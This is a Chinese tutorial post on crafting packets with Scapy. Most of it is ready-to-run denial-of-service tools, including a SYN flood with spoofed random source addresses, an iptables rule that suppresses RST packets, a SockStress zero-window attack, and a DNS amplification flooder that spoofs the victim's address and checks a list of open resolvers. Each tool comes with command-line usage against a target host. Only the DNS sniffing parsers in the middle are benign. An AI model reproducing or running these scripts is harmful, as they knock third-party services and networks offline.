• Python 使用Scapy构造特殊数据包


    Scapy是一款Python库,可用于构建、发送、接收和解析网络数据包。除了实现端口扫描外,它还可以用于实现各种网络安全工具,例如SynFlood攻击,Sockstress攻击,DNS查询攻击,ARP攻击,ARP中间人等。这些工具都是基于构造、发送和解析网络数据包来实现的,可以用于模拟各种网络攻击,测试网络安全防御措施等。Scapy是网络安全领域中非常有用的工具之一。

    21.4.1 SynFlood

    Syn-Flood(Syn洪水攻击)是一种常见的DoS拒绝服务攻击方式,也被称为TCP Syn-Flood攻击。攻击者利用TCP连接建立过程中的漏洞,向目标主机发送大量的TCP连接请求(SYN),目标主机在收到这些请求后会回复一个SYN/ACK确认请求,但是攻击者并不回复ACK确认,使得目标主机在等待ACK确认的过程中,消耗大量的系统资源和带宽,从而导致目标主机无法正常处理合法的连接请求,使得正常用户无法访问该服务。

    默认情况下每一种系统的并发连接都是有限制的,如果恶意攻击持续进行,将会耗尽系统有限的连接池资源。在Windows系统下这个半开连接数是10个,具体来说攻击者可以通过伪造地址对服务器发起SYN请求,服务器就会回应SYN+ACK此时攻击者的主机如果拒绝发送RST+ACK标志,那么服务器接收不到RST请求,就会认为客户端还没有准备好,会重试3-5次并且等待一个SYN Time超时(一般30秒-2分钟)后,丢弃这个连接,虽然有丢包的功能,但是如果攻击者的攻击速度大于目标主机的丢包速度,那么TCP连接池将被填满,此时正常用户将会无法连接到程序中而导致拒绝服务。

    由于在发送SYN报文后我们不希望接收到目标主机回复给我们的RST标志,所以需要执行如下这条防火墙命令,将发送到被害IP的RST包丢弃,这样就可以构造出一个非完全TCP链接,也正是我们想要的效果。

    iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被害主机IP地址 -j DROP
    
    • 1

    接着就是完整的攻击代码,这段代码需要在Linux系统下运行,在运行之前需要指定iface网卡接口,当指定后即可调用攻击代码代码片段实现发包。

    #coding=utf-8
    import argparse
    import socket,sys,random,threading
    from scapy.all import *
    
    scapy.config.conf.iface = 'ens32'
    
    # 攻击目标主机TCP/IP半开放连接数
    def synflood(target,dstport):
        # 加锁
        semaphore.acquire()
        issrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))
        isport = random.randint(1,65535)
        ip = IP(src = issrc,dst = target)
        syn = TCP(sport = isport, dport = dstport, flags = 'S')
        send(ip / syn, verbose = 0)
        print("[+] sendp --> {} {}".format(target,isport))
        # 释放锁
        semaphore.release()
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("-H","--host",dest="host",type=str,help="输入被攻击主机IP地址")
        parser.add_argument("-p","--port",dest="port",type=int,help="输入被攻击主机端口")
        parser.add_argument("--type",dest="types",type=str,help="指定攻击的载荷 (synflood)")
        parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻击并发线程数")
        args = parser.parse_args()
        # 使用方式: main.py --type=synflood -H 192.168.1.1 -p 80 -t 10
        if args.types == "synflood" and args.host and args.port and args.thread:
            semaphore = threading.Semaphore(args.thread)
            while True:
                t = threading.Thread(target=synflood,args=(args.host,args.port))
                t.start()
        else:
            parser.print_help()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35

    读者可自行运行上述代码,通过传入--type=synflood -H 192.168.1.1 -p 80 -t 10参数,其含义是对192.168.1.1主机的80端口执行洪水攻击,并启用10个线程执行,输出效果图如下所示;

    21.4.2 SockStress

    SockStress 全连接攻击属于TCP全连接攻击,其攻击的原理与SYN Flood攻击类似,但是它使用完整的TCP三次握手,这使得它更难以检测和防御。该攻击的关键点就在于,攻击主机将windows窗口缓冲设置为0实现拒绝服务。攻击者向目标发送一个很小的流量,但是会造成产生的攻击流量是一个巨大的,该攻击消耗的是目标系统的CPU/内存资源,使用低配版的电脑,依然可以让庞大的服务器拒绝服务,也称之为放大攻击。

    该攻击方式通过与目标主机建立大量的socket连接,并且都是完整连接,最后的ACK包,将Window窗口大小设置为0,客户端不接收数据,而服务器此时会认为客户端缓冲区还没有准备好,从而一直等待下去(持续等待将使目标机器内存一直被占用),由于是异步攻击,所以单机模式也可以拒绝高配的服务器。

    #coding=utf-8
    import argparse
    import socket,sys,random,threading
    from scapy.all import *
    
    scapy.config.conf.iface = 'ens32'
    
    # 攻击目标主机的Window窗口
    def sockstress(target,dstport):
        # 加锁
        semaphore.acquire()
        isport = random.randint(0,65535)
        response = sr1(IP(dst=target)/TCP(sport=isport,dport=dstport,flags="S"),timeout=1,verbose=0)
        send(IP(dst=target)/ TCP(dport=dstport,sport=isport,window=0,flags="A",ack=(response[TCP].seq +1))/'\x00\x00',verbose=0)
        print("[+] sendp --> {} {}".format(target,isport))
        # 释放锁
        semaphore.release()
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("-H","--host",dest="host",type=str,help="输入被攻击主机IP地址")
        parser.add_argument("-p","--port",dest="port",type=int,help="输入被攻击主机端口")
        parser.add_argument("--type",dest="types",type=str,help="指定攻击的载荷 (sockstress)")
        parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻击并发线程数")
        args = parser.parse_args()
        # 使用方式: main.py --type=sockstress -H 192.168.1.1 -p 80 -t 10
        if args.types == "sockstress" and args.host and args.port and args.thread:
            semaphore = threading.Semaphore(args.thread)
            while True:
                t = threading.Thread(target=sockstress,args=(args.host,args.port))
                t.start()
        else:
            parser.print_help()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33

    这段代码的使用方法与SynFlood攻击保持一致,通过指定--type=sockstress -H 192.168.1.1 -p 80 -t 100即可实现对特定主机特定端口的拒绝服务,输出效果如下图所示;

    21.4.3 DNSSelect

    DNS查询放大攻击是一种利用域名系统(DNS)服务器的缺陷来放大攻击流量的网络攻击。攻击者通过向具有恶意域名的DNS服务器发送DNS查询请求,该服务器会向被攻击者发送响应,但是响应内容比请求更大。攻击者可以利用这种响应的放大效应,将大量流量发送到被攻击者的系统上,从而导致系统资源的耗尽和服务不可用。

    该攻击可以通过欺骗和利用DNS协议的特性进行,通常利用UDP端口53来执行。攻击者会伪造一个源IP地址,向DNS服务器发送一个查询请求,请求的数据包比较小,但是响应的数据包比请求的数据包大很多,这就导致了放大的效果。

    DNS是域名系统(Domain Name System)的缩写,是一个用于将域名转换为IP地址的分布式数据库系统。在进行DNS查询时,客户端会向DNS服务器发送DNS查询请求(DNS Query,DNSQR)包,DNS服务器则会回应DNS响应(DNS Response,DNSRR)包。

    一个DNSQR包含以下重要的字段:

    • 问题域名(QNAME):需要进行查询的域名
    • 查询类型(QTYPE):查询的类型,例如A记录、AAAA记录、CNAME记录等
    • 查询类(QCLASS):查询的类别,通常为Internet(IN)

    一个DNSRR包含以下重要的字段:

    • 资源记录名称(RR NAME):资源记录的名称
    • 资源记录类型(TYPE):资源记录的类型,例如A记录、AAAA记录、CNAME记录等
    • 资源记录类(CLASS):资源记录的类别,通常为Internet(IN)
    • 生存时间(TTL):资源记录在DNS缓存中的生存时间
    • 数据长度(RDLENGTH):资源记录的数据长度
    • 资源记录数据(RDATA):资源记录的数据,例如IPv4地址、IPv6地址、域名等

    我们首先使用Scapy库解析DNSRR数据包,DNSRR是DNS协议中的一种资源记录(Resource Record),用于表示DNS服务器返回的回答记录。其格式包括了Name(域名)、Type(资源记录类型)、Class(资源记录类别)、TTL(生存时间)、RDLENGTH(数据长度)、RDATA(数据)。

    DNS响应中,通常会有多个DNSRR记录,每个记录包含一个域名对应的IP地址或其他资源信息。例如,一个A记录的DNSRR会包含一个域名和一个IPv4地址。而MX记录的DNSRR则会包含一个域名和一个邮件服务器的优先级和地址,如下代码实现了分别提取出含有查询的域名和对应的IPrrnamerdata变量,并将这些数据输出到屏幕。

    #coding=utf-8
    from scapy.all import *
    from IPy import IP as PYIP
    
    # 检查数据包的IP层,提取出IP和TTL字段的值
    def Get_TTL(pkt):
        try:
            if pkt.haslayer(IP):
                ip_src = pkt.getlayer(IP).src
                ip_sport = pkt.getlayer(IP).sport
                ip_dst = pkt.getlayer(IP).dst
                ip_dport = pkt.getlayer(IP).dport
                ip_ttl = str(pkt.ttl)
                print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl))
        except Exception:
            pass
    
    # 获取本机发送出去的DNS请求所对应的网站地址
    def GetDNSRR(pkt):
        if pkt.haslayer(DNSRR):
            rrname = pkt.getlayer(DNSRR).rrname
            rdata = pkt.getlayer(DNSRR).rdata
            ttl = pkt.getlayer(DNSRR).ttl
            print("[+] 域名: {} --> 别名: {} --> TTL: {}".format(rrname,rdata,ttl))
    
    if __name__=="__main__":
        sniff(prn=GetDNSRR,store=0)
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27

    读者可自行运行上述代码,此时当有DNS查询时,则会自动解析出对应的别名以及该主机的TTL值,如下图所示;

    接着我们来解析一下DNSQR,DNSQR是DNS查询请求的部分,用于DNS协议的域名解析。DNSQR包含以下字段:

    • qname:表示查询的域名,例如www.lyshark.com
    • qtype:表示查询类型,通常为A记录、CNAME记录、MX记录等
    • qclass:表示查询类别,通常为IN(Internet)

    DNSQR记录通常包含在DNS消息中的请求部分中,请求部分也可以包含多个DNSQR记录,每个记录对应一个查询,解析此类数据同样很容易实现,具体代码如下所示;

    #coding=utf-8
    from scapy.all import *
    from IPy import IP as PYIP
    
    # 获取本机发送出去的网址请求解析为IP URL --> IP
    def GetDNSQR(pkt):
        # 判断是否含有DNSRR且存在UDP端口53
        if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
            rcode = pkt.getlayer(DNS).rcode
            qname = pkt.getlayer(DNSQR).qname
            # 若rcode为3,则表示该域名不存在
            if rcode == 3:
                print("[-] 域名解析不存在")
            else:
                print("[+] 解析存在:" + str(qname))
    
    if __name__=="__main__":
        sniff(prn=GetDNSQR,store=0)
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    读者可运行上述代码,此时即可输出当前系统内访问过的链接,输出效果如下图所示;

    接着我们就来实现查询放大攻击,查询放大攻击的原理是,通过网络中存在的DNS服务器资源,对目标主机发起拒绝服务攻击,通过伪造源地址为被攻击目标的地址,向DNS递归服务器发起查询请求,此时由于源IP是伪造的,固在DNS服务器回包的时候,会默认回给伪造的IP地址,从而使DNS服务成为了流量放大和攻击的实施者,通过查询大量的DNS服务器,从而实现反弹大量的查询流量,导致目标主机查询带宽被塞满,实现DDOS的目的。

    查询放大攻击的实施依赖于海量的DNS服务器资源,所以在执行攻击时需要自行寻找这些服务器资源,当找到后则可存储到文件内,当需要使用时首先调用Inspect_DNS_Usability函数依次验证DNS服务器的可用性,并将可用的地址保存为pass.log文件,当需要发起攻击时可通过DNS_Flood调用并传入合法的DNS服务器地址实现DNS查询。

    import os,sys,threading,time
    from scapy.all import *
    import argparse
    
    def Inspect_DNS_Usability(filename):
        proxy_list = []
        fp = open(filename,"r")
        for i in fp.readlines():
            try:
                addr = i.replace("\n","")
                respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
                if respon != "":
                    proxy_list.append(str(respon["IP"].src))
            except Exception:
                pass
        return proxy_list
    
    def DNS_Flood(target,dns):
        # 构造IP数据包
        ip_pack = IP()
        ip_pack.src = target
        ip_pack.dst = dns
    #   ip_pack.src = "192.168.1.2"
    #   ip_pack.dst = "8.8.8.8"
        # 构造UDP数据包
        udp_pack = UDP()
        udp_pack.sport = 53
        udp_pack.dport = 53
        # 构造DNS数据包
        dns_pack = DNS()
        dns_pack.rd = 1
        dns_pack.qdcount = 1
        # 构造DNSQR解析
        dnsqr_pack = DNSQR()
        dnsqr_pack.qname = "baidu.com"
        dnsqr_pack.qtype = 255
        dns_pack.qd = dnsqr_pack
        respon = (ip_pack/udp_pack/dns_pack)
        sr1(respon)
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("--mode",dest="mode",help="选择执行命令")
        parser.add_argument("-f","--file",dest="file",help="指定一个DNS字典,里面存储DNSIP地址")
        parser.add_argument("-t",dest="target",help="输入需要攻击的IP地址")
        args = parser.parse_args()
        # 使用方式: main.py --mode=check -f xxx.log
        if args.mode == "check" and args.file:
            proxy = Inspect_DNS_Usability(args.file)
            fp = open("pass.log","w+")
            for item in proxy:
                fp.write(item + "\n")
            fp.close()
            print("[+] DNS地址检查完毕,当前可用DNS保存为 pass.log")
        # 使用方式: main.py --mode=flood -f xxx.log -t 192.168.1.1
        elif args.mode == "flood" and args.target and args.file:
            with open(args.file,"r") as fp:
                countent = [line.rstrip("\n") for line in fp]
                while True:
                    randomDNS = str(random.sample(countent,1)[0])
                    print("[+] 目标主机: {} -----> 随机DNS: {}".format(args.target,randomDNS))
                    t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,))
                    t.start()
        else:
            parser.print_help()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65

    读者可保存这段代码,并自行准备一些DNS服务器地址,放入到dns.log目录下,通过执行如下所示的命令即可依次验证服务器地址可用性,如果可用则自动保存到pass.log文件内,输出效果如下所示;

    当需要对特定主机发起攻击时,可执行如下命令,其中-t带指的则是需要攻击的IP地址,输出效果图如下所示;

  • 相关阅读:
    [蓝桥杯 2020 省 AB1] 走方格
    HashMap复杂方法总结
    矿泉水溴酸盐超标如何解决?除溴酸盐设备有哪些?
    训练神经网络解决二分类问题的原理
    RabbitMQ系列【15】AmqpAdmin使用详解
    Maven 项目中常用的工具包
    玩转代码|逆向分析一下4399小游戏绕过实名认证
    《项目管理》高项十大管理知识点整理(二)
    从零玩转之JPOM自动化部署本地构建 + SSH 发布 java 项目
    【实战技能】非技术背景经理的技术管理
  • 原文地址:https://blog.csdn.net/lyshark_csdn/article/details/134246006